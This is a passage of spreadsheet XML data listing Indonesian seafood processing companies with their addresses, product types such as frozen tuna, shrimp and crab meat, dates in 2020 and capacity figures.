    <s v="Ikan Demersal Segar (Lencam, Kuwe, Kerapu, Kakatua, Merah, Kakap)"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17109"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Lobster Hidup"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17110"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17111"/>
    <x v="492"/>
    <s v="PT. ACEH MARINA LAUT"/>
    <s v="Jl. Awe Blang No.3, Kel. Neusu Aceh, Kec. Baiturrahman, Kota Banda Aceh&lt;br&gt;Aceh"/>
    <n v="1"/>
    <s v="Ikan Demersal Hidup (Kerapu, Kakap)"/>
    <d v="2020-01-24T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17113"/>
    <x v="479"/>
    <s v="PT. KELOLA MINA LAUT UNIT I"/>
    <s v="Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Makerel, Lemadang, Jarum, Pedang, King Fish)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="2800000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17115"/>
    <x v="479"/>
    <s v="PT. KELOLA MINA LAUT UNIT I"/>
    <s v="Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17116"/>
    <x v="479"/>
    <s v="PT. KELOLA MINA LAUT UNIT I"/>
    <s v="Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Bandeng, Patin, Nila)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="2800000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17119"/>
    <x v="479"/>
    <s v="PT. KELOLA MINA LAUT UNIT I"/>
    <s v="Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barakuda, Barramundi, Lencam, Kuwe, Kerapu, Layur, Kakatua, Seabream, Kakap, Kaci-kaci)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17120"/>
    <x v="479"/>
    <s v="PT. KELOLA MINA LAUT UNIT I"/>
    <s v="Jl. KIG Raya Selatan Kav C-5 &amp; C-13 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Cumi-Cumi, Gurita, Sotong)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="1500000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17123"/>
    <x v="257"/>
    <s v="PT. KELOLA MINA LAUT UNIT III"/>
    <s v="Jl. KIG Raya Selatan Kav C15 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Pasteurisasi Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="720000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17124"/>
    <x v="257"/>
    <s v="PT. KELOLA MINA LAUT UNIT III"/>
    <s v="Jl. KIG Raya Selatan Kav C15 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17125"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Fillet Ikan Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17126"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Bandeng Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17127"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Tuna Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17128"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Kerang Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17129"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Teripang Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17130"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Kipas Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17132"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Lobster Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="5000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17133"/>
    <x v="135"/>
    <s v="PT. PUGUH BACHTI KARSA"/>
    <s v="Pergudangan Emerald Green D.8, Bukit Semarang Baru (BSB), Kel. Jatibarang, Kec. Mijen, Kota Semarang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Segar"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17139"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="80"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17140"/>
    <x v="493"/>
    <s v="PT. KELOLA BIRU HARMONI"/>
    <s v="Jl. Industri II, Kel. Tanjung Priok, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Bandeng Beku"/>
    <d v="2020-02-10T00:00:00"/>
    <n v="100"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17148"/>
    <x v="494"/>
    <s v="PT. KELOLA MINA LAUT UNIT II"/>
    <s v="Jl. KIG Raya Selatan Kav C6 &amp; C14 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Daging Rajungan Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="165900"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17153"/>
    <x v="495"/>
    <s v="CV, PUTRA TELLO MANDIRI"/>
    <s v="Jl, Pukat Banting II No,54, Kel, Bantan, Kec, Medan Tembung, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Teripang Kering"/>
    <d v="2020-03-04T00:00:00"/>
    <n v="70000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17154"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Ikan Pelagis Beku (Deho, Malalugis, Cakalang)"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17166"/>
    <x v="494"/>
    <s v="PT. KELOLA MINA LAUT UNIT II"/>
    <s v="Jl. KIG Raya Selatan Kav C6 &amp; C14 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Seafood Bernilai Tambah Beku (Bakso Ikan, Siomay Ikan, Nugget Ikan, Kue Kepiting, Samosa, Roll Udang, Takoyaki, Udang Berlapis Tepung Beku)"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="113684"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17167"/>
    <x v="494"/>
    <s v="PT. KELOLA MINA LAUT UNIT II"/>
    <s v="Jl. KIG Raya Selatan Kav C6 &amp; C14 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="1099000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17168"/>
    <x v="494"/>
    <s v="PT. KELOLA MINA LAUT UNIT II"/>
    <s v="Jl. KIG Raya Selatan Kav C6 &amp; C14 Kawasan Industri Gresik, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Mentah Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="399000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17171"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Loin Segar"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17172"/>
    <x v="180"/>
    <s v="CV. ERPA UTAMA"/>
    <s v="Jl. Raya Sambelia, Dusun Batu Baserung, Kel. Gunung Malang, Kec. Pringgabaya, Kabupaten Lombok Timur&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Tuna Beku"/>
    <d v="2020-03-11T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17180"/>
    <x v="241"/>
    <s v="PT. NUANSA CIPTA MAGELLO"/>
    <s v="Jl. Kima III Kav 5 AB, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Cephalopoda Beku (Cumi-cumi, Gurita, Sotong)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="276000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17181"/>
    <x v="338"/>
    <s v="PT. ETMIECO MAKMUR ABADI"/>
    <s v="Jl. Samuel Languyu No.8A, Kel. Aertembaga Satu, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-28T00:00:00"/>
    <n v="0"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17183"/>
    <x v="496"/>
    <s v="CV. BELIDA"/>
    <s v="Jl. Inspeksi Jasa Tirta, Kel. Bono, Kec. Boyolangu, Kabupaten Tulungagung&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Lele, Gurame, Patin, Nila)"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="350000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17184"/>
    <x v="496"/>
    <s v="CV. BELIDA"/>
    <s v="Jl. Inspeksi Jasa Tirta, Kel. Bono, Kec. Boyolangu, Kabupaten Tulungagung&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Patin Beku"/>
    <d v="2020-01-21T00:00:00"/>
    <n v="1080000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17195"/>
    <x v="497"/>
    <s v="PT. CAKRAWALA SEAFOOD JAYA"/>
    <s v="Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Pelagis Beku (Lemadang, Marlin, Tenggiri)"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="156000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17196"/>
    <x v="497"/>
    <s v="PT. CAKRAWALA SEAFOOD JAYA"/>
    <s v="Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Ikan Demersal Beku (Bawal, Kerapu, Kakap, Layur)"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="156000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17197"/>
    <x v="497"/>
    <s v="PT. CAKRAWALA SEAFOOD JAYA"/>
    <s v="Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Kepiting Beku"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="156000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17198"/>
    <x v="497"/>
    <s v="PT. CAKRAWALA SEAFOOD JAYA"/>
    <s v="Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Rajungan Beku"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="156000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17199"/>
    <x v="497"/>
    <s v="PT. CAKRAWALA SEAFOOD JAYA"/>
    <s v="Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Cephalopoda Beku (Cumi-cumi, Gurita, Sotong)"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="156000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17200"/>
    <x v="497"/>
    <s v="PT. CAKRAWALA SEAFOOD JAYA"/>
    <s v="Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan&lt;br&gt;Lampung"/>
    <n v="10"/>
    <s v="Udang Beku"/>
    <d v="2020-01-22T00:00:00"/>
    <n v="156000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17201"/>
    <x v="498"/>
    <s v="PT. CITA KARYA AGUNG"/>
    <s v="Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Udang Beku"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="108000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17202"/>
    <x v="498"/>
    <s v="PT. CITA KARYA AGUNG"/>
    <s v="Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Kerang Beku"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="60000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17203"/>
    <x v="498"/>
    <s v="PT. CITA KARYA AGUNG"/>
    <s v="Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Pelagis Beku (Senangin, Tenggiri, Selar Kuning)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="648000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17204"/>
    <x v="498"/>
    <s v="PT. CITA KARYA AGUNG"/>
    <s v="Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Malong, Gulama, Biji Nangka, Janahan, Kerapu, Layur, Sukang, Beloso, Bawal, Merah, Kapas-kapas, Rejung)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="3888000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17205"/>
    <x v="498"/>
    <s v="PT. CITA KARYA AGUNG"/>
    <s v="Jl. Pelabuhan Perikanan Lingkungan XI Gabion, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="1620000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17206"/>
    <x v="499"/>
    <s v="CV. YN PUTRA"/>
    <s v="Jl. Kalisolek RT 05 RW 03, Kel. Langenharjo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Terasi Udang"/>
    <d v="2020-01-23T00:00:00"/>
    <n v="1000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17207"/>
    <x v="415"/>
    <s v="PT. CARVINNA TRIJAYA MAKMUR"/>
    <s v="Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Sarden Kaleng, Mackerel Kaleng"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="1600"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17209"/>
    <x v="415"/>
    <s v="PT. CARVINNA TRIJAYA MAKMUR"/>
    <s v="Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga , Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tepung Ikan"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="162000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17210"/>
    <x v="415"/>
    <s v="PT. CARVINNA TRIJAYA MAKMUR"/>
    <s v="Jl. Arnoldus Sompotan, Kel. Aertembaga I, Kec. Aertembaga, Kota Bitung&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Loin Masak Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="482000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17211"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Cumi-cumi, Gurita, Sotong)"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="2000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17212"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Kakap, Kerapu)"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="2000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17213"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Kakap, Kerapu)"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="2000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17214"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Tenggiri, Lemadang, Marlin)"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="2000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17215"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Tenggiri, Lemadang, Marlin)"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="3000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17216"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="20000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17217"/>
    <x v="500"/>
    <s v="PT. GILONTAS INDONESIA"/>
    <s v="Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-01-13T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17222"/>
    <x v="501"/>
    <s v="PT. MACKESSEN INDONESIA"/>
    <s v="Taman Tekno BSD Sektor XI Blok H2 No.29, Kel. Setu, Kec. Setu, Kota Tangerang Selatan&lt;br&gt;Banten"/>
    <n v="11"/>
    <s v="Tepung Karagenan"/>
    <d v="2020-03-24T00:00:00"/>
    <n v="40000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17223"/>
    <x v="502"/>
    <s v="PT. BLUE SEA INDUSTRY"/>
    <s v="Jl. WR Supratman RT 01 RW 15, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kabupaten Pekalongan&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Surimi Beku"/>
    <d v="2020-07-29T00:00:00"/>
    <n v="15000000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17228"/>
    <x v="421"/>
    <s v="PT. PUTRI GUMILANG SEJAHTERA"/>
    <s v="Jl Ringroad Dusun Pereng RT 001 RW 007, Kel. Gendong Kulon, Kec. Babat, Kabupaten Lamongan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Kerapu, Kakap)"/>
    <d v="2020-01-27T00:00:00"/>
    <n v="100000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17241"/>
    <x v="474"/>
    <s v="PT. INTI LUHUR FUJA ABADI"/>
    <s v="Jl. Raya Cangkringmalang Km 6, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="7285"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17242"/>
    <x v="474"/>
    <s v="PT. INTI LUHUR FUJA ABADI"/>
    <s v="Jl. Raya Cangkringmalang Km 6, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Lencam, Manyung, Kerapu, Layur, Sukang, Malabar, Bawal, Seabream, Kakap, Kaci-kaci, Kurisi, Barramundi, Kapas-kapas)"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="77550"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17243"/>
    <x v="474"/>
    <s v="PT. INTI LUHUR FUJA ABADI"/>
    <s v="Jl. Raya Cangkringmalang Km 6, Kel. Cangkringmalang, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Teri, Kembung, Sarden, Banjar, Herring)"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="26980"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17244"/>
    <x v="143"/>
    <s v="PT. ANEKA SUMBER ALAM JAYA"/>
    <s v="Jl. Pandaan Bangil Km 4, Dusun Tudan, Kel. Kemiri Sewu, Kec. Pandaan, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-03-17T00:00:00"/>
    <n v="50000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17269"/>
    <x v="503"/>
    <s v="MENTARI MULYO"/>
    <s v="Derman RT 005, Kel. Sumbermulyo, Kec. Bambang Lipuro, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Lele Asap"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="604800"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17270"/>
    <x v="503"/>
    <s v="MENTARI MULYO"/>
    <s v="Derman RT 005, Kel. Sumbermulyo, Kec. Bambang Lipuro, Kabupaten Bantul&lt;br&gt;Daerah Istimewa Yogyakarta"/>
    <n v="15"/>
    <s v="Bandeng Presto"/>
    <d v="2020-08-18T00:00:00"/>
    <n v="259200"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17294"/>
    <x v="342"/>
    <s v="CV. BEE JAY SEAFOODS"/>
    <s v="Jl. Tanjung Tembaga Barat Pelabuhan Mayangan, Kel. Mayangan, Kec. Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Kipas Beku"/>
    <d v="2020-02-03T00:00:00"/>
    <n v="10000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17296"/>
    <x v="477"/>
    <s v="PT, BARAMUDA BAHARI"/>
    <s v="Desa Wonokoyo, Kec, Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kepiting Beku"/>
    <d v="2020-01-17T00:00:00"/>
    <n v="327845.23"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17298"/>
    <x v="504"/>
    <s v="PT. KAWA GUTI"/>
    <s v="Jl. Ir. Sutami (Tol Lama) No.22, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Beku"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="120000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="17299"/>
    <x v="504"/>
    <s v="PT. KAWA GUTI"/>
    <s v="Jl. Ir. Sutami (Tol Lama) No.22, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Telur Ikan Terbang Kering"/>
    <d v="2020-01-30T00:00:00"/>
    <n v="60000"/>
